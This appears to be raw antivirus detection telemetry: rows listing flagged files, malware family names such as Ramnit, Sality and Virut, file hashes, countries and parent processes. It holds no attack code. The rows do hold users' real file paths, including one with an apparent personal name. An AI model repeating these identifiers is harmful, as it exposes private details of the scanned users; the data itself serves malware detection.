  Row(detection=Row(filename='msetres.dll', filepath='D:\\ip2770\\win\\RES\\MESSAGE\\Arabic\\MSetRes.Dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='7f3771d972e0cf876bf4b95757d8731ddfcea92a6fd5a5661a4ab19d821a9550', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T01:43:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='msetres.dll', filepath='D:\\ip2770\\win\\RES\\MESSAGE\\Arabic\\MSetRes.Dll', filesize=152000, name='W32/Ramnit.C.#M1.#R1'), hash='7f3771d972e0cf876bf4b95757d8731ddfcea92a6fd5a5661a4ab19d821a9550', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T02:56:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='injection.exe', filepath='C:\\Users\\X\\AppData\\Local\\injection.exe', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='7f62bf2df9e8e5f63ccc4c492e0cc60d672f12a5ed28f576a3b5a47c189f10e3', metadata=Row(cmdline='beaal', country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\AppData\\Local\\injection.exe', parentsize=384000, timestamp='2018-11-02T01:35:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='injection.vir', filepath='C:\\Users\\X\\AppData\\Local\\injection.VIR', filesize=384000, name='HEUR/AGEN.1029347.#M1.#R1'), hash='7f62bf2df9e8e5f63ccc4c492e0cc60d672f12a5ed28f576a3b5a47c189f10e3', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3611360, timestamp='2018-11-02T01:36:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\PAJERO NOVA DAKAR - PWJE1712R\\TOOL\\MSV\\ENV\\MSVJ\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='7fc9ed74519b129833488bb727bc5d936576d6f939cfc9458c6ab2e17fc2debf', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7fe6fa9b9e5e57ecbf4d8d1b82322641e77c0d325008dc0bbdd9cd705201b3ff', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7FE6FA9B9E5E57ECBF4D8D1B82322641E77C0D325008DC0BBDD9CD705201B3FF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7fe6fa9b9e5e57ecbf4d8d1b82322641e77c0d325008dc0bbdd9cd705201b3ff', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:16:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7fe6fa9b9e5e57ecbf4d8d1b82322641e77c0d325008dc0bbdd9cd705201b3ff', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7FE6FA9B9E5E57ECBF4D8D1B82322641E77C0D325008DC0BBDD9CD705201B3FF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7fe6fa9b9e5e57ecbf4d8d1b82322641e77c0d325008dc0bbdd9cd705201b3ff', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-anf=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\Rar$LS0.126\\\\\\" -scul -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\t\\\\\\\\Binaries 31.10.2018-5.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-02T10:00:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='7fe6fa9b9e5e57ecbf4d8d1b82322641e77c0d325008dc0bbdd9cd705201b3ff', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\7FE6FA9B9E5E57ECBF4D8D1B82322641E77C0D325008DC0BBDD9CD705201B3FF', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='7fe6fa9b9e5e57ecbf4d8d1b82322641e77c0d325008dc0bbdd9cd705201b3ff', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:53:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='\\\\?\\D:\\Lai xe 4-2017\\VB6\\VFP98\\DISTRIB.SRC\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='TR/Patched.Gen.#M300.#R2947'), hash='801aa52aeafe5ff6025090b7e1a21e03b036ad85c492878bd1b10b9a4c9839e3', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ieudinit.exe', filepath='l:\\d1c4fc7951a621914ee9\\ieudinit.exe', filesize=64000, name='W32/Virut.Gen.#M1.#R1'), hash='8034856a544bc3051539e4fb16adda187e189f6078036d57bb167d339035e5dc', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T18:39:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='pg_config.exe', filepath='C:\\ManageEngine\\SupportCenter\\pgsql\\bin\\pg_config.exe', filesize=128000, name='TR/Patched.Gen.#M300.#R5151'), hash='8075f81132cf522be54d082d9fa92bd5803395f4b384855ed9dd87466b39b900', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:XjKn4Q6ZZ0mM9Zs7.1', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=81640, timestamp='2018-11-02T02:28:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-035928-4faad862', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_03248238\\AVSCAN-20181102-035515-1A5A3B07\\AVSCAN-20181102-035928-4FAAD862', filesize=832000, name='TR/Snarasite.807b68.#M1.#R1'), hash='807b6827c5a58b9bf1505ddd4556e81aa286e90a324b8d263f95e5a31e9fe122', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T02:59:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{C6E639E3-12B6-4CA3-BE05-00E533F97068}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='8084f671f775f9cc0ce1d51a565b15efcde2fb26f84a3b18999c44b0e76c1ecd', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:42:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082141-5ddffcad', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8160b79c\\AVSCAN-20181102-081646-3B9AB17F\\AVSCAN-20181102-082141-5DDFFCAD', filesize=1536000, name='HEUR/AGEN.1009067.#M1.#R1'), hash='809373f0b818ac2617c2898b187f8c42a66ee3f6b5a672c35a6627dbbdd0ad21', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:21:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-082011-5366d558', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_8160b79c\\AVSCAN-20181102-081646-3B9AB17F\\AVSCAN-20181102-082011-5366D558', filesize=1536000, name='HEUR/AGEN.1009067.#M1.#R1'), hash='809373f0b818ac2617c2898b187f8c42a66ee3f6b5a672c35a6627dbbdd0ad21', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T07:20:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='atheros_ar9285_wireless_network_adapter_9.2.1.459_win7_amd64.exe', filepath='G:\\Sicherungen\\Asus Laptop Treiber\\8Treiber\\Treiber 17.02.2015\\Atheros_AR9285_Wireless_Network_Adapter_9.2.1.459_win7_amd64.exe', filesize=1536000, name='HEUR/AGEN.1009067.#M1.#R1'), hash='809373f0b818ac2617c2898b187f8c42a66ee3f6b5a672c35a6627dbbdd0ad21', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-02T07:16:26Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='final.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Trunks\\final\\final.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='80b48bbb80ed2b360a73ec987b718c5da91efc9431fc6443c65a6742a95f88bb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tien.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Tien\\Tien.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='80b48bbb80ed2b360a73ec987b718c5da91efc9431fc6443c65a6742a95f88bb', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:39:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bootpart.exe', filepath='C:\\Program Files (x86)\\UltraISO\\drivers\\bootpart.exe', filesize=256000, name='W32/Infector.Gen8.#M300.#R700734'), hash='80d83a515b7dd7a562e476ffe00c24a46f3a8d379cda7d4ca2b6e5dbed3281a2', metadata=Row(cmdline='\\\\\\/Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=248320, timestamp='2018-11-02T10:37:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bootpart.exe', filepath='C:\\Program Files (x86)\\UltraISO\\drivers\\bootpart.exe', filesize=256000, name='W32/Infector.Gen8.#M300.#R700734'), hash='80d83a515b7dd7a562e476ffe00c24a46f3a8d379cda7d4ca2b6e5dbed3281a2', metadata=Row(cmdline='\\\\\\/Processid:{02D4B3F1-FD88-11D1-960D-00805FC79235}', country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\dllhost.exe', parentsize=248320, timestamp='2018-11-02T23:33:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\OneDrive\\LAB\\A\\MITSUBISHI LUCIANO\\OUTLANDER\\New Outlander MY16_Inglês\\16OUTLANDER_ENG (E)\\TOOL\\VISTAMSV\\ENV\\VISTAMSVJ\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='80eaefa55d87aefb707b91efc202b13c22413f8ff6aad64dee6ab9bbc3441425', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe48_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe48 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T13:07:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T06:08:17Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:34:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:39:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T17:39:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T14:07:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T10:10:33Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T13:47:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~6e4c7221.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~6e4c7221.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='813279b1aee8249802ea399c68af28e6df334a393b3804d3e11c83e788bc4fc8', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-090701-8ed55dba', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_71a0094a\\AVSCAN-20181102-090621-88C8498C\\AVSCAN-20181102-090701-8ED55DBA', filesize=380000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='81922228b4beba7ed2d0beb28fc10a568be0dc1f26341efa0125a3a2058a9e54', metadata=Row(cmdline=None, country='JO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:07:03Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll', filepath='C:\\Program Files (x86)\\LPT\\Smartbar.Communication.dll', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='82d0187b163f5a6dc502ecba80d7f08f2edc71d9ac4de685c3f3af0809cece5c', metadata=Row(cmdline='-x -s 4000', country='CH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\dw20.exe', parentsize=33936, timestamp='2018-11-02T23:11:19Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='smartbar.communication.dll.vir', filepath='\\\\?\\C:\\AdwCleaner\\Quarantine\\C\\Program Files (x86)\\LPT\\Smartbar.Communication.dll.vir', filesize=20000, name='PUA/Linkury.Gen2.#M300.#R101296'), hash='82d0187b163f5a6dc502ecba80d7f08f2edc71d9ac4de685c3f3af0809cece5c', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T19:52:14Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adobepsl.dll', filepath='C:\\Program Files\\Adobe\\Adobe Fireworks CS3\\AdobePSL.dll', filesize=12288000, name='W32/Ramnit.CD.#M1.#R1'), hash='82e76e2a6dddf63c384c2be32373c2513e87437a207f47100dc66ed6a54ed3c2', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe', parentsize=1378648, timestamp='2018-11-02T06:01:32Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='adobepsl.dll', filepath='C:\\Program Files\\Adobe\\Adobe Fireworks CS3\\AdobePSL.dll', filesize=12288000, name='W32/Ramnit.CD.#M1.#R1'), hash='82e76e2a6dddf63c384c2be32373c2513e87437a207f47100dc66ed6a54ed3c2', metadata=Row(cmdline=None, country='TR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=818784, timestamp='2018-11-02T08:20:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='82f026d9819428812a413f681f78d01f180017d6cc6f7040911a40feeddbcf69', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\82F026D9819428812A413F681F78D01F180017D6CC6F7040911A40FEEDDBCF69', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='82f026d9819428812a413f681f78d01f180017d6cc6f7040911a40feeddbcf69', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:40:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='82f026d9819428812a413f681f78d01f180017d6cc6f7040911a40feeddbcf69', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-36\\82F026D9819428812A413F681F78D01F180017D6CC6F7040911A40FEEDDBCF69', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='82f026d9819428812a413f681f78d01f180017d6cc6f7040911a40feeddbcf69', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:00:40Z'), dt=datetime.date(2018, 11, 2)),
